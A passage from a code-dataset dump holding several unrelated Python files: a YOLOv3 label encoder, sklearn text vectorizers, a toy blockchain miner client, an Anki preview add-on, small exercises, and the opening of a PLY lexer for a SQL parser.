np.linspace(MIN_INPUT_SIZE, MAX_INPUT_SIZE, INPUT_SIZE_COUNT)\n self.input_sizes = self.input_sizes.astype(np.int32)\n\n self.strides = np.asarray(STRIDES)\n self.anchors = np.asarray(ANCHORS, dtype = np.float32).reshape((3, 3, 2))\n\n def Encode(self, image_path, gt_bboxes, gt_classes, input_size, augment = False):\n # input_size = random.choice(self.input_sizes)\n output_sizes = input_size // self.strides\n \n image = cv2.imread(image_path)\n if augment:\n image, gt_bboxes, gt_classes = DataAugmentation(image, gt_bboxes, gt_classes)\n\n image_h, image_w, c = image.shape\n\n image = cv2.resize(image, (input_size, input_size), interpolation = cv2.INTER_CUBIC)\n labels = [np.zeros((output_size, output_size, 3, 5 + CLASSES)) for output_size in output_sizes] \n\n # normalize\n gt_bboxes /= [image_w, image_h, image_w, image_h] \n gt_bboxes *= input_size\n\n for gt_bbox, gt_class in zip(gt_bboxes, gt_classes):\n ccwh_bbox = xyxy_to_ccwh(gt_bbox)\n onehot = smooth_one_hot(gt_class, CLASSES)\n\n positive_count = 0\n\n best_max_iou = 0.0\n best_label_index = 0\n best_anchor_index = 0\n\n for i in range(3):\n anchors = np.zeros((3, 4), dtype = np.float32)\n anchors[:, :2] = ccwh_bbox[:2]\n anchors[:, 2:] = self.anchors[i]\n \n # anchors (cx, cy, w, h -> left, top, right, bottom)\n anchors[:, :2], anchors[:, 2:] = anchors[:, :2] - anchors[:, 2:] / 2, \\\n anchors[:, :2] + anchors[:, 2:] / 2\n\n ious = compute_bboxes_IoU(anchors, gt_bbox[np.newaxis, :])[:, 0]\n mask = ious >= IOU_THRESHOLD\n\n if positive_count == 0:\n max_iou = np.max(ious)\n max_index = np.argmax(ious)\n\n if max_iou > best_max_iou:\n best_max_iou = max_iou\n best_label_index = i\n best_anchor_index = max_index\n\n x_index, y_index = (ccwh_bbox[:2] / STRIDES[i]).astype(np.int32)\n \n labels[i][y_index, x_index, mask, :4] = gt_bbox\n labels[i][y_index, x_index, mask, 4] = 1\n labels[i][y_index, x_index, mask, 5:] = onehot\n\n positive_count += np.sum(mask)\n\n if positive_count == 0:\n x_index, y_index = (ccwh_bbox[:2] / STRIDES[best_label_index]).astype(np.int32)\n labels[best_label_index][y_index, x_index, best_anchor_index, :4] = gt_bbox\n labels[best_label_index][y_index, x_index, best_anchor_index, 4] = 1\n labels[best_label_index][y_index, x_index, best_anchor_index, 5:] = onehot\n\n slabel_data = labels[0].reshape((-1, 5 + CLASSES))\n mlabel_data = labels[1].reshape((-1, 5 + CLASSES))\n llabel_data = labels[2].reshape((-1, 5 + CLASSES))\n label_data = np.concatenate([slabel_data, mlabel_data, llabel_data], axis = 0)\n\n return image, label_data\n \n def Decode(self, pred_data, input_size, image_wh, detect_threshold = 0.5, use_nms = True):\n pred_data = pred_data\n mask = pred_data[:, 4] >= detect_threshold\n\n pred_confs = pred_data[mask, 4][:, np.newaxis]\n pred_bboxes = np.concatenate([pred_data[mask, :4], pred_confs], axis = -1)\n\n pred_classes = np.argmax(pred_data[mask, 5:], axis = -1)\n pred_bboxes[:, :4] = convert_bboxes(pred_bboxes[:, :4], image_wh = image_wh, ori_wh = [input_size, input_size])\n\n if use_nms:\n pred_bboxes, pred_classes = class_nms(pred_bboxes, pred_classes)\n\n return pred_bboxes, pred_classes\n \nif __name__ == '__main__':\n\n utils = YOLOv3_Utils()\n\n for data in np.load('./dataset/validation_detection.npy', allow_pickle = True):\n image_name, gt_bboxes, gt_classes = data\n\n image_path = VALID_DIR + image_name\n gt_bboxes = np.asarray(gt_bboxes, dtype = np.float32)\n gt_classes = np.asarray([CLASS_DIC[c] for c in gt_classes], dtype = np.int32)\n\n image = cv2.imread(image_path)\n h, w, c = 
image.shape\n \n # print(w, h)\n # print(gt_bboxes[:, [0, 2]].min(), gt_bboxes[:, [0, 2]].max())\n # print(gt_bboxes[:, [1, 3]].min(), gt_bboxes[:, [1, 3]].max())\n # print(gt_bboxes.shape)\n\n input_size = 608\n image, label_data = utils.Encode(image_path, gt_bboxes, gt_classes, input_size)\n pred_bboxes, pred_classes = utils.Decode(label_data, input_size, [input_size, input_size])\n\n print(input_size)\n\n for pred_bbox, pred_class in zip(pred_bboxes, pred_classes):\n xmin, ymin, xmax, ymax = pred_bbox[:4].astype(np.int32)\n cv2.putText(image, CLASS_NAMES[pred_class], (xmin, ymin - 10), 1, 1, (0, 255, 0), 2)\n cv2.rectangle(image, (xmin, ymin), (xmax, ymax), (0, 255, 0), 2)\n\n cv2.imshow('show', image)\n cv2.waitKey(0)\n\n # print(image.shape, label_data.keys())\n # print(image.shape, label_data.shape)\n # input()\n ","sub_path":"YOLOv3_Utils.py","file_name":"YOLOv3_Utils.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"335566456","text":"from itertools import tee\n\nimport numpy as np\nfrom rich.progress import track\nfrom scipy.sparse import csr_matrix\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.feature_extraction import FeatureHasher\n\nfrom ..bblock.doc import DocBuilder, Document\nfrom ..bblock.token import Token\nfrom tqdm import tqdm\n\n\ndef check_type(X):\n if not all(isinstance(x, str) for x in X):\n raise ValueError(f\"X should be an iterable string. {type(X)} found\")\n\n\ndef check_doc_type(X):\n if not all(isinstance(x, Document) for x in X):\n raise ValueError(f\"X should be an iterable sadedegel Document. {type(X)} found\")\n\n\nclass OnlinePipeline(Pipeline):\n def partial_fit(self, X, y=None, **kwargs):\n for i, step in enumerate(self.steps):\n name, est = step\n est.partial_fit(X, y, **kwargs)\n if i < len(self.steps) - 1:\n X = est.transform(X)\n return self\n\n\nclass Text2Doc(BaseEstimator, TransformerMixin):\n Doc = None\n\n def __init__(self, tokenizer=\"icu\", hashtag=False, mention=False, emoji=False, progress_tracking=True):\n self.tokenizer = tokenizer\n self.hashtag = hashtag\n self.mention = mention\n self.emoji = emoji\n self.progress_tracking = progress_tracking\n # TODO: Add sadedegel version\n\n self.init()\n\n def init(self):\n if Text2Doc.Doc is None:\n Text2Doc.Doc = DocBuilder(tokenizer=self.tokenizer, tokenizer__hashtag=self.hashtag,\n tokenizer__mention=self.mention, tokenizer__emoji=self.emoji)\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. 
Found {n_total}\")\n\n docs = []\n\n for text in tqdm(X, disable=not hasattr(self, 'progress_tracking') or not self.progress_tracking, unit=\"doc\"):\n docs.append(Text2Doc.Doc(text))\n\n return docs\n\n\nclass SadedegelVectorizer(BaseEstimator, TransformerMixin):\n \"\"\"Sadedegel feature extraction TransformerMixin s don't require fit calls.\"\"\"\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n\nclass HashVectorizer(BaseEstimator, TransformerMixin):\n def __init__(self, n_features=1048576, *, alternate_sign=True):\n self.n_features = n_features\n self.alternate_sign = alternate_sign\n\n def fit(self, X, y=None):\n return self\n\n def partial_fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, docs):\n def feature_iter():\n for d in docs:\n yield [('prefix5', t.lower_[:5]) for t in d.tokens] + [('prefix3', t.lower_[:3]) for t in\n d.tokens]\n\n return FeatureHasher(self.n_features, alternate_sign=self.alternate_sign, input_type=\"pair\",\n dtype=np.float32).transform(feature_iter())\n\n\nclass TfidfVectorizer(SadedegelVectorizer):\n def __init__(self, *, tf_method='raw', idf_method='probabilistic', drop_stopwords=True,\n lowercase=True,\n drop_suffix=True, drop_punct=True, show_progress=True):\n super().__init__()\n\n self.tf_method = tf_method\n self.idf_method = idf_method\n self.lowercase = lowercase\n self.drop_suffix = drop_suffix\n self.drop_stopwords = drop_stopwords\n self.drop_punct = drop_punct\n self.show_progress = show_progress\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_doc_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_doc_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. Found {n_total}\")\n\n indptr = [0]\n indices = []\n data = []\n for doc in track(X, total=n_total, description=\"Transforming document(s)\", update_period=1,\n disable=not self.show_progress):\n if self.lowercase:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size\n else:\n n_vocabulary = doc.builder.tokenizer.vocabulary.size_cs\n\n tfidf = doc.get_tfidf(self.tf_method, self.idf_method, drop_stopwords=self.drop_stopwords,\n lowercase=self.lowercase,\n drop_suffix=self.drop_suffix,\n drop_punct=self.drop_punct)\n\n for idx in tfidf.nonzero()[0]:\n indices.append(idx)\n data.append(tfidf[idx])\n\n indptr.append(len(indices))\n\n return csr_matrix((data, indices, indptr), dtype=np.float32, shape=(n_total, n_vocabulary))\n\n\nclass BM25Vectorizer(SadedegelVectorizer):\n def __init__(self, *, tf_method='raw', idf_method='probabilistic', k1=1.25, b=0.75, delta=0,\n drop_stopwords=True,\n lowercase=True, drop_suffix=True, drop_punct=True, show_progress=True):\n\n super().__init__()\n\n self.tf_method = tf_method\n self.idf_method = idf_method\n self.lowercase = lowercase\n self.drop_suffix = drop_suffix\n self.drop_stopwords = drop_stopwords\n self.drop_punct = drop_punct\n self.show_progress = show_progress\n self.k1 = k1\n self.b = b\n self.delta = delta\n\n def transform(self, X, y=None):\n if isinstance(X, list):\n check_doc_type(X)\n n_total = len(X)\n else:\n X1, X2, X = tee(X, 3)\n\n check_doc_type(X1)\n n_total = sum((1 for _ in X2))\n\n if n_total == 0:\n raise ValueError(f\"Ensure that X contains at least one valid document. 
Found {n_total}")\n\n        indptr = [0]\n        indices = []\n        data = []\n        for doc in track(X, total=n_total, description="Transforming document(s)", update_period=1,\n                         disable=not self.show_progress):\n\n            if self.lowercase:\n                n_vocabulary = doc.builder.tokenizer.vocabulary.size\n            else:\n                n_vocabulary = doc.builder.tokenizer.vocabulary.size_cs\n\n            bm25 = doc.get_bm25(self.tf_method, self.idf_method, drop_stopwords=self.drop_stopwords,\n                                lowercase=self.lowercase,\n                                drop_suffix=self.drop_suffix,\n                                drop_punct=self.drop_punct,\n                                k1=self.k1, b=self.b, delta=self.delta)\n\n            for idx in bm25.nonzero()[0]:\n                indices.append(idx)\n                data.append(bm25[idx])\n\n            indptr.append(len(indices))\n\n        return csr_matrix((data, indices, indptr), dtype=np.float32, shape=(n_total, n_vocabulary))\n","sub_path":"sadedegel/extension/sklearn.py","file_name":"sklearn.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"551154782","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nmi, sigma=100,15\nx=mi+sigma*np.random.randn(500000)\nsigma**2 # sigma squared, i.e. the variance\nn, bins, patches=plt.hist(x,50,density=True,facecolor='green',alpha=0.75)# transparency 0.75\nbincenters=0.5*(bins[1:]+bins[:-1])# average adjacent bin edges to get the bin centers\ny=mlab.normpdf(bincenters,mi,sigma)\nl=plt.plot(bincenters, y,'r--',linewidth=1)\nplt.show()\n","sub_path":"zadanie3_7.py","file_name":"zadanie3_7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"26106927","text":"def sqrt(x):\n    if x < 0:\n        raise ValueError('invalid input')\n    if x == 0:\n        return 0\n    left = 1\n    right = x\n    while left <= right:\n        mid = left + (right - left) // 2\n        if x / mid == mid:\n            return mid\n        elif x / mid < mid:\n            right = mid - 1\n        else:\n            left = mid + 1\n    return right\n\nprint(sqrt(12)) # 3","sub_path":"project_1/practice_12.py","file_name":"practice_12.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"33045176","text":"# -*- mode: Python ; coding: utf-8 -*-\n# Copyright © 2013 Roland Sieker \n# License: GNU AGPL, version 3 or later;\n# http://www.gnu.org/licenses/agpl.html\n#\n# Provenance: Large parts of this file are taken from the clayout.py\n# CardLayout class from Anki2.\n# written by Damien Elmes \n\n"""\nShow a preview of the current card.\n\nAnki2 add-on to show a preview of the current card in the card\nbrowser.\n"""\n\nimport re\n\nfrom PyQt4.QtCore import Qt, SIGNAL\nfrom PyQt4.QtGui import QDialog, QHBoxLayout, QVBoxLayout, QWidget, QPushButton\nfrom PyQt4.QtWebKit import QWebPage\n\nimport aqt\nfrom anki.sound import playFromText, clearAudioQueue\nfrom aqt.utils import saveGeom, restoreGeom, getBase, mungeQA,\\n    showInfo, askUser, openHelp, openLink\nfrom anki.utils import isMac, isWin, joinFields\nfrom anki.lang import _\nfrom aqt.webview import AnkiWebView\nimport anki.js\n\n\nclass CardPreview(QDialog):\n\n    def __init__(self, mw, parent=None):\n        QDialog.__init__(self, parent or mw, Qt.Window)\n        self.mw = aqt.mw\n        self.card = None\n        self.playedAudio = {}\n        self.main = QVBoxLayout()\n        self.setLayout(self.main)\n        self.setup_main()\n\n    def setup_main(self):\n        """\n        Add the front and back preview\n\n        This is mostly taken from clayout.\n        """\n        bl = QHBoxLayout()\n        self.main.addLayout(bl)\n        preview = QWidget()\n        pform = aqt.forms.preview.Ui_Form()\n        pform.setupUi(preview)\n        if self.style().objectName() == "gtk+":\n            # gtk+ requires margins in inner layout\n            pform.frontPrevBox.setContentsMargins(0, 11, 0, 0)\n            pform.backPrevBox.setContentsMargins(0, 11, 0, 0)\n        pform.frontWeb = AnkiWebView()\n        pform.frontPrevBox.addWidget(pform.frontWeb)\n        pform.backWeb = AnkiWebView()\n        pform.backPrevBox.addWidget(pform.backWeb)\n        def linkClicked(url):\n            openLink(url)\n        for wig in pform.frontWeb, pform.backWeb:\n            wig.page().setLinkDelegationPolicy(\n                QWebPage.DelegateExternalLinks)\n            self.connect(wig, SIGNAL("linkClicked(QUrl)"), linkClicked)\n        self.main.addWidget(preview, 5)\n        # keep a reference for renderPreview()\n        self.pform = pform\n\n    def show(self, card):\n        self.card = card\n        self.renderPreview()\n\n    def renderPreview(self):\n        c = self.card\n        if not c:\n            return\n        ti = self.maybeTextInput\n        base = getBase(self.mw.col)\n        self.pform.frontWeb.stdHtml(\n            ti(mungeQA(c.q(reload=True))), self.mw.reviewer._styles(),\n            bodyClass="card card%d" % (c.ord+1), head=base,\n            js=anki.js.browserSel)\n        self.pform.backWeb.stdHtml(\n            ti(mungeQA(c.a()), type='a'), self.mw.reviewer._styles(),\n            bodyClass="card card%d" % (c.ord+1), head=base,\n            js=anki.js.browserSel)\n        clearAudioQueue()\n        if c.id not in self.playedAudio:\n            playFromText(c.q())\n            playFromText(c.a())\n            self.playedAudio[c.id] = True\n\n    def maybeTextInput(self, txt, type='q'):\n        if type == 'q':\n            repl = ""\n        else:\n            repl = _("(typing comparison appears here)")\n        repl = "
<center>%s</center>
    \" % repl\n return re.sub(\"\\[\\[type:.+?\\]\\]\", repl, txt)\n","sub_path":"Preview.py","file_name":"Preview.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"112110170","text":"import pprint, uuid, subprocess, json, threading, sys\nfrom crypto3002 import *\nfrom blockchain3002 import *\nfrom common3002 import *\n\nunminedTransactionList = [] #Transactions not yet on the blockchain\nblockchain = [] #Transactions on the blockchain\n\n#Easiest possible initial target, will mine in one attempt\nglobal target\ntarget = 2**256\n\n#Lachlan Newman\n#Isaac Ward\n#Receives any data from the server\ndef receive(ssl_sock, stopRecv):\n #Will be ran as a continuously looping thread that waits for received transmissions\n while not stopRecv(): \n #Load transmission\n transmission = json.loads(ssl_sock.recv(4096).decode()) #Up to 4KB of data\n \n #If nothing in loaded transmission, retry\n if not transmission:\n break\n \n #Announce newly received target\n header = transmission['header']\n print(\"'\" + header + \"' received.\")\n\n #Obtain header to decide appropriate course of action\n #Only accepted headers FROM server TO miner are:\n #MINING COMPLETE\n #NEW TARGET\n #TRANSACTION\n \n if(header == \"MINING COMPLETE\"):\n #Add any mining completes to the global list of mining completes\n blockchain.append(makeBlock(blockchain, transmission['data']))\n \n #Remove this from the unmined list, as it has now been mined\n t = transmission['data']['transaction']\n if t in unminedTransactionList: unminedTransactionList.remove(t)\n \n elif(header == \"NEW TARGET\"):\n #A new network target has been recalculated, adjust local targets accordingly\n global target\n target = transmission['data']\n \n elif(header == \"TRANSACTION\"):\n #A transaction has been observed, add it to the list of unmined transactions\n unminedTransactionList.append(transmission['data'])\n \n else:\n #Unrecognised header\n print(\"Unrecognised header '\" + header + \"', discarding transmission.\")\n\n#Lachlan Newman\n#Transmitting any data to the server\ndef transmit(ssl_sock, data, header):\n #Only accepted headers FROM miner TO server are:\n #MINING COMPLETE\n \n #Build transmission as a dict\n transmission = {}\n transmission['data'] = data\n transmission['header'] = header\n \n #Send transmission\n print(\"Transmitting to server.\")\n ssl_sock.send(json.dumps(transmission).encode()) \n \n\n#Isaac R. Ward\n#Print out a list of transactions in the working directory that can be mined\ndef printMinableTransactions():\n print(\"\")\n\n #Prints every unmined transaction with ID's increasing monotonically from 0\n ID = 0\n for ut in unminedTransactionList:\n print(json.dumps(ut, indent = 4) + \"transaction \" + str(ID) + \"\\n\")\n ID = ID + 1\n \n if ID == 0:\n print(\"There are currently no unmined transactions.\\n\")\n else:\n print(\"There are currently \" + str(ID) + \" unmined transaction(s), with ID's 0 through to \" + str(ID - 1) + \".\\n\")\n \n#Isaac R. 
Ward\n#Print out a list of transactions in the working directory that can be mined using file names rather than public keys where possible\ndef printMinableTransactionsWithFileNames(fileKeyPairs):\n print(\"\")\n\n #Prints every unmined transaction with ID's increasing monotonically from 0\n ID = 0\n for ut in unminedTransactionList:\n tmpSrcPubKey = ut['srcPubKey']\n tmpDestPubKey = ut['destPubKey']\n \n for p in fileKeyPairs:\n if p['string'] == ut['srcPubKey']:\n ut['srcPubKey'] = p['file']\n if p['string'] == ut['destPubKey']:\n ut['destPubKey'] = p['file']\n \n print(json.dumps(ut, indent = 4) + \"transaction \" + str(ID) + \"\\n\")\n ID = ID + 1\n \n ut['srcPubKey'] = tmpSrcPubKey\n ut['destPubKey'] = tmpDestPubKey\n \n if ID == 0:\n print(\"There are currently no unmined transactions.\\n\")\n else:\n print(\"There are currently \" + str(ID) + \" unmined transaction(s), with ID's 0 through to \" + str(ID - 1) + \".\\n\")\n \n#Isaac R. Ward \n#Called when the option m is selected form the command line, gets the information required to mine\ndef mine(minerPublicKey, publicPairList):\n #Select a transaction to mine, and load it into a dict for verifying & mining\n ID = input(\"Input ID of transaction to mine:\\n\") \n if((int(ID) > len(unminedTransactionList) - 1) or not ID.isdigit()):\n #Out of bounds\n print(\"No transaction matches that ID.\\n\")\n return -1\n \n transaction = unminedTransactionList[int(ID)]\n \n #Trying to find the sender's public key from the public keys folder\n srcPublicFile = \"\"\n print(\"Attempting to locate a public key from the 'publicKeys' folder that matches the sender's public key.\")\n for p in publicPairList:\n if p['string'] == transaction['srcPubKey']:\n srcPublicFile = p['file']\n \n #Announce to user that a matching public key was or was not found\n if srcPublicFile == \"\":\n print(\"A matching public key could not be found as a .pem file in the 'publicKeys' folder (add this file to the folder and use the 'r' option before trying again). 
The message cannot be verified and will not be mined.\")\n return -1\n else:\n print(\"A matching public key was found in the file: \" + srcPublicFile)\n \n #Verify if the transaction was legitamitely sent from the given sender by comparing against the message signature \n if(verifyTransaction(transaction, \"publicKeys/\" + srcPublicFile)):\n print(\"The selected transaction has been successfully verified.\")\n \n #If verification succeeds, begin the mining process in a new thread, monitor if anyone on the network\n #has already mined the transaction simultaneously, and cancel mining if so\n metrics = {} #count, time, nonce, digest\n metrics['c'] = 0 \n metrics['t'] = 0 \n metrics['n'] = 0\n metrics['d'] = \"\"\n \n #lambda function used to stop mining thread when appropriate\n stop = False\n global target\n miningThread = threading.Thread(target=proofOfWork, args=(transaction, target, metrics, lambda: stop))\n miningThread.start()\n \n #Check that nobody has mined the same transaction\n progress = 0\n progressIcon = [\"- \", \"\\ \", \"| \", \"/ \", \"- \", \"\\ \", \"| \", \"/ \"]\n #progressIcon = [\"-=======\", \"=-======\", \"==-=====\", \"===-====\", \"====-===\", \"=====-==\", \"======-=\", \"=======-\", \"======-=\", \"=====-==\", \"====-===\", \"===-====\", \"==-=====\", \"=-======\"]\n \n while(miningThread.isAlive()):\n #Indicate to user that mining is occuring\n print(\"\\rMining \" + progressIcon[int(progress/100) % len(progressIcon)], end=\"\")\n progress = progress + 1\n \n for b in blockchain:\n if b['transaction'] == transaction:\n #This means a mining complete signal has already occured for the transaction we are mining\n stop = True #Will stop the mining thread\n \n #Announce outcome to user\n print(\"\\rAnother miner has completed mining this transaction already;\\ncancelling mining & removing transaction from unmined transactions list.\\n\")\n unminedTransactionList.remove(transaction)\n \n return -1\n \n #Neaten up command line output\n print(\"\\r\", end=\"\")\n \n #If out of this loop, must have successfully been the first person on the network to mine transaction\n #Print metrics\n print(\"Mined w/ nonce \" + str(metrics['n']) + \" in time: \" + str(metrics['t'])) \n \n #Announce to user\n print(\"\\rRemoving transaction from unmined transactions list.\\n\")\n unminedTransactionList.remove(transaction)\n \n #Add the target at this time to be written into the blockchain\n metrics['target'] = target\n \n successfulMine = {}\n successfulMine['miner'] = minerPublicKey\n successfulMine['metrics'] = metrics\n successfulMine['transaction'] = transaction\n \n #Return this information\n return successfulMine \n \n else:\n #If not verifiable, do not mine as message has been altered with and could be fraudulent\n print(\"Transaction cannot be verified and will not be mined.\\n\") \n \n #Return symbolic -1 as error \n return -1\n \n#Isaac R. 
Ward\n#Repeatedly ran through to get user input\ndef mainProgramLoop(ssl_sock, minerPublicKey):\n #Create an dictionary that maps user's public keys to the filenames that they are held in\n publicPairList = getPublicPairs()\n \n for p in publicPairList:\n if p['file'] == minerPublicKey:\n publicKeyString = p['string']\n\n while(True):\n #Prompt the user to do an action\n instructions = \"Options: \\n\\t'r' to read any changes made to the 'publicKeys' folder, \\n\\t'l' to list unmined transactions by ID, \\n\\t'lf' to list unmined transactions by ID with .pem file names instead of key strings (based off the contents of the 'publicKeys' folder), \\n\\t'm' to select a transaction to mine based on ID, \\n\\t't' to view the target, \\n\\t'q' to quit.\\n\"\n option = input(instructions)\n while(option != \"r\" and option != \"l\" and option != \"m\" and option != \"q\" and option != \"lf\" and option != \"t\"):\n print(\"Unrecognised option.\")\n option = input(instructions)\n\n #Take action depending on option\n if(option == \"l\"):\n #List unverified, minable transactions received by the wallet\n printMinableTransactions()\n \n elif(option == \"r\"):\n #Re read the publicKeys folder\n publicPairList = getPublicPairs();\n \n elif(option == \"lf\"):\n #List unmined transactions using filenames where possible\n printMinableTransactionsWithFileNames(publicPairList)\n \n elif(option == \"m\"):\n #Begin the process of mining, -1 indicates unverifiable or unsuccessfulmine\n info = mine(publicKeyString, publicPairList)\n if(info != -1):\n #Verified and mined\n transmit(ssl_sock, info, \"MINING COMPLETE\")\n \n elif(option == \"t\"):\n #User has requested to view the target\n global target #Using the global target, not creating some local variable\n print(\"The current network target is:\\n\" + str(target) + \"\\nA hash digest LESS THAN this number is required to beat it.\\n\")\n \n elif(option == \"q\"):\n #Quit\n break\n\n#Isaac R. Ward\n#Gets the public key with which the mines will be accredited with\ndef getMinerPublicKey():\n #Get the miner's public key base on a file in the public keys file\n instructions = \"Enter the name of the .pem file holding the public key that will be acredited with this session's mines:\\n\"\n publicKeyFile = input(instructions)\n while not os.path.isfile(\"publicKeys/\" + publicKeyFile):\n print(\"File not found. Please try again.\")\n publicKeyFile = input(instructions)\n\n return publicKeyFile\n\n#Lachlan Newman\n#Isaac R. 
Ward\nif __name__ == '__main__':\n #Create a ssl socket connection to server\n ssl_sock = createSSLSocket()\n \n #Use lambda function to close thread\n stopRecv = False\n \n #Gets the public key with which the mines will be accredited with\n minerPublicKey = getMinerPublicKey()\n \n #Start the receiving thread, as we must continuously monitor for incoming messages on the given socket\n receiveThread = threading.Thread(target=receive, args=(ssl_sock, lambda: stopRecv))\n #Setting a thread to be a daemon ensures it will end when main does\n receiveThread.daemon = True\n receiveThread.start()\n \n #Enter the main user control loop\n mainProgramLoop(ssl_sock, minerPublicKey)\n \n print(\"Ending user input thread.\")\n \n stopRecv = True\n \n print(\"Ending mining program.\")\n\n sys.exit()\n\n \n \n\n","sub_path":"build 01-06-17 2/miner.py","file_name":"miner.py","file_ext":"py","file_size_in_byte":12332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"50242366","text":"\n\ndef refine_parameters(data):\n '''Refine the parameters of a dictionary\n\n Returns:\n Return a dictionary of cleaned input\n '''\n clean_dict = {}\n\n # Write your code here.\n\n #We will iterate over the keys in the given json\n for key in data:\n \ttry:\n \t\tclean_dict[key] = int(data[key])\n \texcept:\n \t\tif type(data[key]) == dict:\n \t\t\t# Recursive case if there is another dictionary within the answer\n \t\t\tprint(data[str(key)])\n \t\t\tclean_dict[key] = refine_parameters(data[str(key)])\n\n \t\telif type(data[key]) == list or type(data[key]) == tuple:\n \t\t\t# Case if there is an array, we need to refine all the parameters\n \t\t\tclean_dict[key] = []\n \t\t\tfor item in data[key]:\n \t\t\t\ttry:\n \t\t\t\t\tclean_dict[key].append(int(item))\n \t\t\t\texcept:\n \t\t\t\t\tclean_dict[key].append(item)\n \t\telif data[key] == 'false':\n \t\t\tclean_dict[key] = False\n \t\telif data[key] == 'true':\n \t\t\tclean_dict[key] = True\n \t\telse:\n \t\t\tclean_dict[key] = data[key]\n\n return clean_dict\n","sub_path":"python_solution.py","file_name":"python_solution.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94810028","text":"def isPhoneNumber(text):\n if len(text) != 12: # 12 character string y/n\n return False\n for i in range(0, 3): # Are the first 3 digits\n if not text[i].isdecimal():\n return False\n if text[3] != '-': # Is there a dash after 3 character\n return False\n if i in range(4, 7): # Are the next 3 characters digits\n if not text[i].isdecimal():\n return False\n if text[7] != '-': # Is there a dash after the 7th character\n return False\n for i in range(8, 12): # Are the last characters all decimal\n if not text[i].isdecimal():\n return False\n return True\n \nprint('415-555-4242 is a phone number:')\nprint(isPhoneNumber('415-555-4242'))\nprint('Moshi moshi is a phone number:')\nprint(isPhoneNumber('Moshi moshi')) \n \n","sub_path":"ABS/part_2/isPhoneNumber.py","file_name":"isPhoneNumber.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217671869","text":"import ply.lex as lex\nimport re\nfrom parse.errors import Error as our_error\nfrom parse.expressions.expressions_math import *\nfrom parse.expressions.expressions_base import *\nfrom parse.expressions.expressions_trig import *\nfrom parse.sql_common.sql_general import *\nfrom 
parse.sql_ddl.create import *\nfrom parse.sql_ddl.alter import *\nfrom parse.sql_dml.insert import *\nfrom parse.sql_ddl.drop import *\nfrom parse.sql_dml.select import *\nfrom parse.sql_dml.update import *\nfrom parse.sql_dml.delete import *\nfrom treeGraph import *\nfrom parse.symbol_table import *\nfrom parse.plpgsql.function import *\nfrom parse.plpgsql.declaration import *\nfrom parse.plpgsql.index import *\n\nfrom parse.plpgsql.control import *\nfrom parse.functions.functions_aggregate import *\nfrom ply.lex import LexToken\n# ===========================================================================================\n# ==================================== LEXICAL ANALYSIS ==================================\n# ===========================================================================================\nreserved = {\n 'smallint' : 'SMALLINT',\n 'integer' : 'INTEGER',\n 'bigint' : 'BIGINT',\n 'decimal' : 'DECIMAL',\n 'numeric' : 'NUMERIC',\n 'real' : 'REAL',\n 'double' : 'DOUBLE',\n 'precision' : 'PRECISION',\n 'money' : 'MONEY',\n 'caracter' : 'CARACTER',\n 'varying' : 'VARYING',\n 'varchar' : 'VARCHAR',\n 'character' : 'CHARACTER',\n 'char' : 'CHAR',\n 'text' : 'TEXT',\n 'timestamp' : 'TIMESTAMP',\n 'date' : 'DATE',\n 'time' : 'TIME',\n 'interval' : 'INTERVAL',\n 'year' : 'YEAR',\n 'month' : 'MONTH',\n 'day' : 'DAY',\n 'hour' : 'HOUR',\n 'minute' : 'MINUTE',\n 'second' : 'SECOND',\n 'extract' : 'EXTRACT',\n 'date_part' : 'DATE_PART',\n 'now' : 'NOW',\n 'current_date' : 'CURRENT_DATE',\n 'current_time' : 'CURRENT_TIME',\n 'boolean' : 'BOOLEAN',\n 'between' : 'BETWEEN',\n 'symmetric' : 'SYMMETRIC',\n 'in' : 'IN',\n 'like' : 'LIKE',\n 'ilike' : 'ILIKE',\n 'similar' : 'SIMILAR',\n 'is' : 'IS',\n 'null' : 'NULL',\n 'not' : 'NOT',\n 'and' : 'AND',\n 'or' : 'OR',\n 'select' : 'SELECT',\n 'from' : 'FROM',\n 'where' : 'WHERE',\n 'create' : 'CREATE',\n 'type' : 'TYPE',\n 'as' : 'AS',\n 'enum' : 'ENUM',\n 'replace' : 'REPLACE',\n 'database' : 'DATABASE',\n 'if' : 'IF',\n 'exists' : 'EXISTS',\n 'owner' : 'OWNER',\n 'mode' : 'MODE',\n 'show' : 'SHOW',\n 'databases' : 'DATABASES',\n 'alter' : 'ALTER',\n 'rename' : 'RENAME',\n 'to' : 'TO',\n 'drop' : 'DROP',\n 'current_user' : 'CURRENT_USER',\n 'session_user' : 'SESSION_USER',\n 'table' : 'TABLE',\n 'default' : 